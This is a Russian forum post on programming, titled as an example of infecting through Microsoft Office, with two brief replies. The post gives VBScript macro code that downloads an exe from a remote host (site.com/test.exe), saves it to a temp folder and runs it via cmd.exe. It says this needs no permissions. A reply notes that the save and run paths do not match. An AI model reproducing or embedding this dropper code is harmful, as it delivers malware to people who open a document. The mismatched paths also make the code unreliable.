Пример скачивания и запуска файла через Microsoft office (VBS) : Программирование

Occul · █ 22.12.2022 11:26

Пример заражения через Microsoft office

Все вы наверное слышали, что можно скачать файл и запустить его через документ Office или Excel. Сейчас мы вам расскажем про эту технологию.

Тут на самом деле ни чего сложного нет, и весь секрет хранится в макросах. Все документы офиса поддерживают макросы. Макрос это скрипты написанные на visual basic scripts (vbs). Пример простого запуска макроса можно найти тут https://olegon.ru/showthread.php?t=37679.

⚡ Код скачивания файла

Код:

Set oXMLHTTP = CreateObject("MSXML2.XMLHTTP") 
oXMLHTTP.Open "GET", "http://site.com/test.exe", 0
oXMLHTTP.Send 
Set oADOStream = CreateObject("ADODB.Stream") 
oADOStream.Mode = 3 
oADOStream.Type = 1 
oADOStream.Open 
oADOStream.Write oXMLHTTP.responseBody 
oADOStream.SaveToFile "c:\windiws\temp\test.exe", 2

⚡ Код запуска exe.

Код:

Set shell = WScript.CreateObject("WScript.Shell")
Set resp = shell.exec("cmd.exe /c C:\windows\temp\test.exe")
word = resp.StdOut.ReadAll() 
segm = Split(word, vbcrlf)
word = "cmd /c " & chr(34) & segm (0) & chr(34) 
shell.exec( word )

Сохраняем и запускаем файл из темпа. Там не требуется получать каких либо разрешений.

Dim · █ 22.12.2022 12:36

не взлетит - сохраняем в один каталог, а запускать пытаемся с другого

(0Мб)

OlegON · █ 22.12.2022 12:40

так это не один код, а два разных ;) на самом деле главное-то суть... интересно...